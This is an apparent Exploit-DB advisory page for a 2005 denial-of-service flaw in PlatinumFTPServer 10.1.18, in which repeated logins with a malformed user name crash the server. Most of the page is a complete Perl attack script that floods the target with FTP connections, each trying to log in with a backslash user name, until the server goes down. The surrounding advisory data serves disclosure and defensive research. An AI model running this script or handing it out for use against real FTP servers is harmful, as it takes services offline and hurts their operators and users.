PlatinumFTPServer Denial of Service Vulnerability

vendor:

PlatinumFTPServer

by:

ports at securityforest dot com

7.5

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: PlatinumFTPServer

Affected Version From: 10.1.18

Affected Version To: 10.1.18

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

PlatinumFTPServer Denial of Service Vulnerability

PlatinumFTPServer is prone to a denial-of-service vulnerability. This issue is reported to occur when a remote user makes 50 or more connections that attempt to authenticate with a malformed user name.

Mitigation:

N/A

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12790/info

PlatinumFTPServer is prone to a denial-of-service vulnerability. This issue is reported to occur when a remote user makes 50 or more connections that attempt to authenticate with a malformed user name. 

#!/usr/bin/perl
# plftpdos1.pl - Remote DoS against PlatinumFTP 10.1.18 using \
# 
# If you don't get the server down try to change/play a little bit with
# the Timeout

# 2005/05/03
#
# ports at securityforest dot com | greetings to muts, barabas, s|33py,
# revised and all guys at www.whitehat.co.il


use strict;
use Net::FTP;

my $host;
my $username = '\\';

if ($#ARGV < 0) { &syntax(); }
$host = @ARGV[0]; 

my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21) or die "can you see a ftp server? i can't.\n";

print "denial of service in progress\n";

while (my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21))
{
    my $ftp = Net::FTP->new($host, Timeout => 0.1, Debug => 0, Port => 21);
    $ftp->login($username);
}

print "server is down. now run forest, RUN!\n";

sub syntax {
    print "\nUsage: pftpdos1.pl IP\n";
    exit (1);
    }